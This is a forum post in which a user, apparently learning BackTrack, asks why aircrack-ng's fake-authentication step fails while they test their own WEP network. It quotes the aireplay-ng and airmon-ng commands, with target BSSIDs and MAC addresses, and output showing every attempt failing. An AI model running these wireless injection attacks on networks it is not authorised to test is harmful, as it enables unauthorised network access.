okay so im starting to get the feel for this whole Linux deal so tonight i tried to pen test my wep system and i followed the instructions off the aircrack website and i am getting through the steps just fine until i get to
Code:
bt ~ # aireplay-ng -1 0 -e Scarletnet -a 00:14:6C:3E:90:E8 -h 00:06:25:01:92:74 eth1
and instead of getting the expected outcome of
Code:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
i get .....
Code:
21:20:45 Waiting for beacon frame (BSSID: 00:14:6C:3E:90:E8) on channel 6
21:20:45 Sending Authentication Request (Open System)
21:20:47 Sending Authentication Request (Open System)
21:20:49 Sending Authentication Request (Open System)
21:20:51 Sending Authentication Request (Open System)
21:20:53 Sending Authentication Request (Open System)
21:20:55 Sending Authentication Request (Open System)
21:20:57 Sending Authentication Request (Open System)
21:20:59 Sending Authentication Request (Open System)
21:21:01 Sending Authentication Request (Open System)
21:21:03 Sending Authentication Request (Open System)
21:21:05 Sending Authentication Request (Open System)
21:21:07 Sending Authentication Request (Open System)
21:21:09 Sending Authentication Request (Open System)
21:21:11 Sending Authentication Request (Open System)
21:21:13 Sending Authentication Request (Open System)
21:21:15 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
and i even tried the other way
Code:
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
but i get the same error so now I'm at a loss of what to do.
i dont know if this will help but ill post what my shell looks like so if anyone can help
Code:
Interface Chipset Driver
eth1 HermesI orinoco (monitor mode enabled)
bt ~ # aireplay-ng -1 0 -e Scarletnet -a 00:14:6C:3E:90:E8 -h 00:06:25:01:92:74 eth1
21:20:23 Waiting for beacon frame (BSSID: 00:14:6C:3E:90:E8) on channel 10
21:20:23 eth1 is on channel 10, but the AP uses channel 6
bt ~ # airmon-ng start eth1 6
Interface Chipset Driver
eth1 HermesI orinoco (monitor mode enabled)
bt ~ # aireplay-ng -1 0 -e Scarletnet -a 00:14:6C:3E:90:E8 -h 00:06:25:01:92:74 eth1
21:20:45 Waiting for beacon frame (BSSID: 00:14:6C:3E:90:E8) on channel 6
21:20:45 Sending Authentication Request (Open System)
21:20:47 Sending Authentication Request (Open System)
21:20:49 Sending Authentication Request (Open System)
21:20:51 Sending Authentication Request (Open System)
21:20:53 Sending Authentication Request (Open System)
21:20:55 Sending Authentication Request (Open System)
21:20:57 Sending Authentication Request (Open System)
21:20:59 Sending Authentication Request (Open System)
21:21:01 Sending Authentication Request (Open System)
21:21:03 Sending Authentication Request (Open System)
21:21:05 Sending Authentication Request (Open System)
21:21:07 Sending Authentication Request (Open System)
21:21:09 Sending Authentication Request (Open System)
21:21:11 Sending Authentication Request (Open System)
21:21:13 Sending Authentication Request (Open System)
21:21:15 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
bt ~ # aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:06:25:01:92:74 eth1
21:22:09 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 6
bt ~ # aireplay-ng -1 6000 -o 1 -q 10 -e Scarletnet -a 00:14:6C:3E:90:E8 -h 00:06:25:01:92:74 eth1
21:22:57 Waiting for beacon frame (BSSID: 00:14:6C:3E:90:E8) on channel 6
21:22:57 Sending Authentication Request (Open System)
21:22:59 Sending Authentication Request (Open System)
21:23:01 Sending Authentication Request (Open System)
21:23:03 Sending Authentication Request (Open System)
21:23:05 Sending Authentication Request (Open System)
21:23:07 Sending Authentication Request (Open System)
21:23:09 Sending Authentication Request (Open System)
21:23:11 Sending Authentication Request (Open System)
21:23:13 Sending Authentication Request (Open System)
21:23:15 Sending Authentication Request (Open System)
21:23:17 Sending Authentication Request (Open System)
21:23:19 Sending Authentication Request (Open System)
21:23:21 Sending Authentication Request (Open System)
21:23:23 Sending Authentication Request (Open System)
21:23:25 Sending Authentication Request (Open System)
21:23:27 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
bt ~ #
thanks